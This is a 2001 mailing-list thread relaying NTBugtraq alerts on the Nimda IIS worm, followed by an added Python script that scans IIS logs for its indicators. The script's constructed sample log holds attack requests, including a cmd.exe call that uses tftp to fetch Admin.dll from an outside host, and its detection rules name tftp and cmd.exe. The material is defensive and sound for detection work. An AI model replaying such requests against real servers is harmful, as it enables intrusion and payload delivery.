Correction:  Kaspersky has it in the latest daily update.

----- Original Message ----- 
From: "Jerry Murdock" <[EMAIL PROTECTED]>
To: <[EMAIL PROTECTED]>
Sent: Tuesday, September 18, 2001 2:15 PM
Subject: Re: [imail] OT: Alert: New IIS Worm


> Norman and F-Prot "appear" to be first from my checks.  McAfee just updated
> their site - _BUT NOTE_  you have to get the extra.dat for this specific
> virus.  A normal update will not get it.
> 
> Norton, Kaspersky and Trend are silent on the subject.
> 
> Jerry
> 
> ----- Original Message -----
> From: "Jasmine" <[EMAIL PROTECTED]>
> To: <[EMAIL PROTECTED]>
> Sent: Tuesday, September 18, 2001 2:07 PM
> Subject: Re: [imail] OT: Alert: New IIS Worm
> 
> 
> > what about the rest of us who aren't using f-prot
> >
> > From:           "Jerry Murdock" <[EMAIL PROTECTED]>
> > To:             <[EMAIL PROTECTED]>
> > Date sent:      Tue, 18 Sep 2001 13:55:59 -0400
> > Subject:        Re: [imail] OT: Alert: New IIS Worm
> > Send reply to:  [EMAIL PROTECTED]
> >
> > FYI:
> >
> > F-Prot users.  The update for this was just released.  Get the new
> > fp-def.zip.
> >
> > Jerry
> >
> > ----- Original Message -----
> > From: "Terrence Koeman" <[EMAIL PROTECTED]>
> > To: <[EMAIL PROTECTED]>
> > Sent: Tuesday, September 18, 2001 12:42 PM
> > Subject: [imail] OT: Alert: New IIS Worm
> >
> >
> > > Offtopic
> > >
> > > From NTBUGTRAQ:
> > >
> > > ------------------------
> > > There have been numerous reports of IIS attacks being generated by
> > > machines over a broad range of IP addresses. These "infected"
> > > machines are using a wide variety of attacks which attempt to exploit
> > > already known and patched vulnerabilities against IIS.
> > >
> > > It appears that the attacks can come both from email and from the
> > > network.
> > >
> > > A new worm, being called w32.nimda.amm, is being sent around. The
> > > attachment is called README.EXE and comes as a MIME-type of
> > > "audio/x-wav" together with some html parts. There appears to be no
> > > text in this message when it is displayed by Outlook when in
> > > Auto-Preview mode (always a good indication there's something not
> > > quite right with an email.)
> > >
> > > The network attacks against IIS boxes are a wide variety of attacks.
> > > Amongst them appear to be several attacks that assume the machine is
> > > compromised by Code Red II (looking for ROOT.EXE in the /scripts and
> > > /msadc directory, as well as an attempt to use the /c and /d virtual
> > > roots to get to CMD.EXE). Further, it attempts to exploit numerous
> > > other known IIS vulnerabilities.
> > >
> > > One thing to note is the attempt to execute TFTP.EXE to download a
> > > file called ADMIN.DLL from (presumably) some previously compromised
> > > box.
> > >
> > > Anyone who discovers a compromised machine (a machine with ADMIN.DLL
> > > in the /scripts directory), please forward me a copy of that .dll
> > > ASAP.
> > >
> > > Also, look for TFTP traffic (UDP69). As a safeguard, consider doing
> > > the following;
> > >
> > > edit %systemroot/system32/drivers/etc/services.
> > >
> > > change the line;
> > >
> > > tftp 69/udp
> > >
> > > to;
> > >
> > > tftp 0/udp
> > >
> > > thereby disabling the TFTP client. W2K has TFTP.EXE protected by
> > > Windows File Protection so can't be removed.
> > >
> > > More information as it arises.
> > >
> > > Cheers,
> > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > ------------------------
> > > Ok, whoa horsy, I've got lots of copies of ADMIN.DLL now thanks!
> > >
> > > Analysis is still on-going to determine precisely what the infecting
> > > files do (there are potentially two, ADMIN.DLL and README.EXE).
> > >
> > > Some people have said their boxes seem unstable. It could be because
> > > of numerous copies of TFTP.EXE in memory. At this point it might be
> > > best to disconnect any computer that appears unstable from the
> > > network, until such time as sufficient analysis has been performed to
> > > advise how best to bring the box back on-line.
> > >
> > > It is also possible for client machines to perform the attacks that
> > > we're seeing, if you have a way to filter outbound HTTP requests you
> > > should look for anything that contains "/scripts" or "tftp" in the
> > > URL and treat as suspicious.
> > >
> > > The internal threat by this one is no different (and maybe worse)
> > > than CRII. We've seen indications of WnetEnumResource calls as well
> > > as references to IPC$. There may be NetBIOS share activity associated
> > > with the worm, and if so, it will likely spread rapidly internally.
> > >
> > > More than likely you will see the biggest effect in terms of a DoS
> > > (from many source machines). This thing cares not whether you're an
> > > IIS box or not, it tries regardless. As this spreads the effects may
> > > become more severe (no, I'm not going to provide a quote on how
> > > severe). Make sure your inbound (and preferably your outbound)
> > > router rules are restricted to only those protocols that must be
> > > present, and ideally to machine IP addresses that should have access.
> > >
> > > More as it becomes available.
> > >
> > > Cheers,
> > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > ------------------------
> > > Numerous people have reported that on IIS servers infected with
> > > w32.nimda.amm, when visitors browse to their website the visitor is
> > > offered up README.EML, which in turn downloads README.EXE to the
> > > visitor.
> > >
> > > Please, check your IIS boxes now to see if you are infected. I've had
> > > reports of IIS servers with more than 10,000 .eml files present
> > > (mostly as a result of nimda).
> > >
> > > While we don't have any conclusive disinfecting procedures yet, any
> > > IIS box that has been infected definitely shouldn't be available to
> > > clients until we do.
> > >
> > > Cheers,
> > > Russ - Surgeon General of TruSecure Corporation/NTBugtraq Editor
> > > ------------------------
> > >
> > >
> > > --
> > > Regards,
> > >
> > > Terrence Koeman
> > >
> > > Technical Director/Administrator
> > > MediaMonks B.V. (www.mediamonks.nl)
> > >
> > > Please quote all replies in correspondence.
> >
> >
> >
> >
> >
> > ______________________________________________________________________
> > The HKSI-IMail Admin List is hosted by........ Humankind Systems, Inc.
> > Questions, Comments or Complain like Hell.. mailto:[EMAIL PROTECTED]
> > Message Archive... http://www.tallylist.com/archives/index.cfm/mlist.4
> > To Manage your Subscription......... http://humankindsystems.com/lists
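The NTBugtraq note quoted above names several indicators an administrator can look for in IIS logs: requests for ROOT.EXE under /scripts and /msadc (the Code Red II backdoor), use of the /c and /d virtual roots to reach CMD.EXE, TFTP invocations fetching ADMIN.DLL, and, more coarsely, anything containing "/scripts" or "tftp". The script below is an added example written for this page, not code from the thread or from NTBugtraq; it turns those indicators into detection rules and runs them over a handful of constructed IIS W3C extended log lines (the `#Fields:` layout, the IP addresses and the timestamps are all made up, and the rule names are my own labels). It parses the header to locate columns rather than assuming positions, so it also copes with logs whose field order differs.

```python
"""Scan IIS W3C extended log lines for the request patterns described in the
NTBugtraq Nimda note (added example; sample log data below is constructed)."""
import re
from collections import Counter

# One rule per indicator named in the advisory. Keys are descriptive labels of my own.
RULES = {
    "root.exe backdoor": re.compile(r"/(?:scripts|msadc)/root\.exe", re.I),
    "virtual-root cmd.exe": re.compile(r"^/[cd]/.*cmd\.exe", re.I),
    "tftp": re.compile(r"tftp", re.I),
    "/scripts": re.compile(r"/scripts", re.I),
}

# Constructed sample log in IIS W3C extended format (not a real capture).
SAMPLE_LOG = """#Software: Microsoft Internet Information Services 5.0
#Date: 2001-09-18 16:05:00
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 16:05:01 198.51.100.7 GET /index.htm - 200
2001-09-18 16:05:02 192.0.2.10 GET /scripts/root.exe /c+dir 404
2001-09-18 16:05:02 192.0.2.10 GET /MSADC/root.exe /c+dir 404
2001-09-18 16:05:03 192.0.2.10 GET /c/winnt/system32/cmd.exe /c+dir 404
2001-09-18 16:05:03 192.0.2.10 GET /scripts/root.exe /c+tftp+-i+192.0.2.10+GET+Admin.dll 404
2001-09-18 16:05:09 203.0.113.5 GET /images/logo.gif - 200
2001-09-18 16:05:10 203.0.113.9 GET /d/winnt/system32/cmd.exe /c+dir 404
"""


def parse_w3c(lines):
    """Yield one dict per log record, using the #Fields: header to name columns."""
    fields = None
    for line in lines:
        line = line.rstrip("\n")
        if not line:
            continue
        if line.startswith("#Fields:"):
            fields = line[len("#Fields:"):].split()
            continue
        if line.startswith("#"):
            continue  # other W3C directives (#Software, #Date) carry no records
        if fields is None:
            raise ValueError("log has no #Fields: header before the first record")
        values = line.split()
        if len(values) != len(fields):
            continue  # malformed line: skip rather than mis-align the columns
        yield dict(zip(fields, values))


def classify(record):
    """Return the labels of every rule matching the request stem and query."""
    target = record.get("cs-uri-stem", "") + " " + record.get("cs-uri-query", "")
    return [name for name, rx in RULES.items() if rx.search(target)]


def scan(lines):
    """Return (hits per source IP, list of (ip, stem, matched rule labels))."""
    by_source = Counter()
    hits = []
    for rec in parse_w3c(lines):
        names = classify(rec)
        if names:
            by_source[rec["c-ip"]] += 1
            hits.append((rec["c-ip"], rec["cs-uri-stem"], names))
    return by_source, hits


def likely_infected_sources(by_source, threshold=3):
    """The advisory describes each infected host trying a whole series of exploits;
    a source with several hits is more likely a worm than a single stray probe."""
    return sorted(ip for ip, n in by_source.items() if n >= threshold)


if __name__ == "__main__":
    by_source, hits = scan(SAMPLE_LOG.splitlines())
    for ip, stem, names in hits:
        print(f"{ip:15} {stem:35} {', '.join(names)}")
    print("likely infected sources:", likely_infected_sources(by_source))
```

The threshold in `likely_infected_sources` is deliberately conservative: a lone request for `/scripts/...` may be a scanner or a legitimate CGI path, whereas the sequence the advisory describes (root.exe probes, the virtual-root cmd.exe attempts, then a tftp fetch) from one address within seconds is the worm's signature. Point the parser at a real `ex*.log` file instead of `SAMPLE_LOG` to run it against a production server.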
